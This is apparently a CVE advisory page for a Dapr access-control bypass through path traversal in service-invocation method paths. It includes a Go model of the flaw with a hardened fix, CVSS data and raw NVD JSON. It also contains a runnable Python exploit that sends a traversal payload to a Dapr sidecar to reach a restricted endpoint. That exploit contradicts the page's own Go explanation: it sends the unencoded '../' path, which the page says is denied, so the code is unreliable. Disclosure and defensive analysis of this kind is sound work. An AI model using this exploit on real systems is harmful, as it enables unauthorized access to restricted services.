Security Vulnerability Report
CVE-2026-41491 CVSS 8.1 HIGH

CVE-2026-41491

Published: 2026-05-08 14:16:33
Last Modified: 2026-05-08 16:08:16

Description

Dapr is a portable, event-driven runtime for building distributed applications across cloud and edge. From versions 1.3.0 to before 1.15.14, 1.16.0-rc.1 to before 1.16.14, and 1.17.0-rc.1 to before 1.17.5, a vulnerability in Dapr allows bypassing access control policies for service invocation using reserved URL characters and path traversal sequences in method paths. The ACL normalized the method path independently of the dispatch layer, so the ACL evaluated one path while the target application received a different one: a method path that the policy accepts as a call to an allowed endpoint can arrive at the application as a call to a restricted one. This issue has been patched in versions 1.15.14, 1.16.14, and 1.17.5.
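To make the parser differential concrete, the following Go example (added here; it is not Dapr's code, and the Policy type, the two "view" functions and the hardened check are assumptions of the example, not Dapr's implementation) models an ACL that cleans the method path but never percent-decodes it next to an application that decodes the path and then routes on it. A method path such as health/%2e%2e/admin/config passes the policy as a call under /health yet reaches the application as /admin/config. The hardened variant decodes once, rejects anything that is not already canonical, and hands the same string to both the policy check and dispatch, so the two layers cannot disagree.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"strings"
)

// Policy is a toy allow-list standing in for an access-control policy:
// a caller may invoke any method whose canonical path is one of the
// prefixes or lies below it. This is an assumption of the example.
type Policy struct {
	AllowedPrefixes []string
}

func (p Policy) permits(method string) bool {
	for _, prefix := range p.AllowedPrefixes {
		if method == prefix || strings.HasPrefix(method, prefix+"/") {
			return true
		}
	}
	return false
}

// aclView models an ACL that collapses dot segments but never
// percent-decodes, so "%2e%2e" is treated as an opaque segment name.
func aclView(rawMethod string) string {
	return path.Clean("/" + rawMethod)
}

// appView models what the target application routes on: the raw method
// is forwarded, the app's HTTP stack percent-decodes it, and its router
// collapses the resulting dot segments.
func appView(rawMethod string) string {
	decoded, err := url.PathUnescape(rawMethod)
	if err != nil {
		decoded = rawMethod
	}
	return path.Clean("/" + decoded)
}

// vulnerableInvoke decides on one view of the path and delivers another.
// It returns whether the ACL allowed the call and the path the app sees.
func vulnerableInvoke(p Policy, rawMethod string) (allowed bool, delivered string) {
	if !p.permits(aclView(rawMethod)) {
		return false, ""
	}
	return true, appView(rawMethod)
}

// hardenedInvoke decodes exactly once, refuses paths that are not already
// canonical (dot segments, empty segments, encoded separators) instead of
// repairing them, and uses the single canonical string for both the ACL
// decision and dispatch.
func hardenedInvoke(p Policy, rawMethod string) (allowed bool, delivered string) {
	if strings.Contains(strings.ToLower(rawMethod), "%2f") {
		return false, "" // an encoded "/" is never a legitimate segment character
	}
	decoded, err := url.PathUnescape(rawMethod)
	if err != nil {
		return false, ""
	}
	canonical := "/" + strings.TrimPrefix(decoded, "/")
	if path.Clean(canonical) != canonical {
		return false, "" // ".", "..", "//" or trailing "/" present: reject
	}
	if !p.permits(canonical) {
		return false, ""
	}
	return true, canonical
}

func main() {
	p := Policy{AllowedPrefixes: []string{"/health"}}
	// Constructed sample method paths, from benign to traversal.
	for _, raw := range []string{"health", "admin/config", "health/../admin/config", "health/%2e%2e/admin/config"} {
		vOK, vPath := vulnerableInvoke(p, raw)
		hOK, hPath := hardenedInvoke(p, raw)
		fmt.Printf("%-28s vulnerable: allowed=%-5t app sees %-16q hardened: allowed=%-5t app sees %q\n",
			raw, vOK, vPath, hOK, hPath)
	}
}
```

The unencoded health/../admin/config is denied even by the vulnerable model, because both layers collapse a literal ".." the same way; the bypass needs the encoded form, which is why the advisory names reserved URL characters alongside traversal sequences. The fix is not a better normalizer in the ACL but a single canonicalization shared by every consumer of the path.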

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD yet (record status: Undergoing Analysis). The affected ranges below are taken from the description.

Dapr 1.3.0 up to, but not including, 1.15.14
Dapr 1.16.0-rc.1 up to, but not including, 1.16.14
Dapr 1.17.0-rc.1 up to, but not including, 1.17.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-41491: Dapr access control bypass via path traversal in the
# service invocation method path. The ACL and the dispatch layer normalized the
# method path independently, so a path the ACL accepts can reach the app as a
# different path.
#
# Note: requests/urllib3 remove dot segments ("..") from the URL path before
# sending, which would silently defeat this test. http.client sends the path
# verbatim, so it is used here instead.
import http.client
import sys


def build_payload(allowed_path, restricted_path):
    """Prepend an allowed method path to a traversal into the restricted one,
    e.g. health/../admin/config."""
    return f"{allowed_path}/../{restricted_path}"


def exploit_poc(target_host, app_id, allowed_path, restricted_path, timeout=5):
    """Send the traversal payload through the Dapr sidecar's service
    invocation API and report the response status."""
    payload = build_payload(allowed_path, restricted_path)
    path = f"/v1.0/invoke/{app_id}/method/{payload}"
    print(f"[*] Sending GET {path} to {target_host}")
    conn = http.client.HTTPConnection(target_host, timeout=timeout)
    try:
        # No client-side URL normalization happens here: the path goes out
        # exactly as built.
        conn.request("GET", path, headers={"Content-Type": "application/json"})
        response = conn.getresponse()
        body = response.read().decode(errors="replace")
        if response.status == 200:
            print("[+] 200 OK. Compare the body with a direct request to "
                  f"/v1.0/invoke/{app_id}/method/{restricted_path}, which the "
                  "ACL should deny, to confirm the bypass.")
            print(f"[+] Response body: {body[:200]}")
        else:
            print(f"[-] Request returned status {response.status}")
    except OSError as e:
        print(f"[!] Error occurred: {e}")
    finally:
        conn.close()


if __name__ == "__main__":
    # Configuration: sidecar address (host:port) and app-id of the target,
    # set for an authorized test environment.
    TARGET = sys.argv[1] if len(sys.argv) > 1 else "dapr-sidecar-ip:3500"
    TARGET_APP_ID = "vulnerable-app"
    # Assume /health is allowed by the ACL and /admin/config is restricted.
    ALLOWED_ENDPOINT = "health"
    RESTRICTED_ENDPOINT = "admin/config"
    exploit_poc(TARGET, TARGET_APP_ID, ALLOWED_ENDPOINT, RESTRICTED_ENDPOINT)

References

https://github.com/dapr/dapr/pull/9589
https://github.com/dapr/dapr/security/advisories/GHSA-85gx-3qv6-4463

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41491", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:33.407", "lastModified": "2026-05-08T16:08:15.570", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dapr is a portable, event-driven, runtime for building distributed applications across cloud and edge. From versions 1.3.0 to before 1.15.14, 1.16.0-rc.1 to before 1.16.14, and 1.17.0-rc.1 to before 1.17.5, a vulnerability has been found in Dapr that allows bypassing access control policies for service invocation using reserved URL characters and path traversal sequences in method paths. The ACL normalized the method path independently from the dispatch layer, so the ACL evaluated one path while the target application received a different one. This issue has been patched in versions 1.15.14, 1.16.14, and 1.17.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/dapr/dapr/pull/9589", "source": "[email protected]"}, {"url": "https://github.com/dapr/dapr/security/advisories/GHSA-85gx-3qv6-4463", "source": "[email protected]"}]}}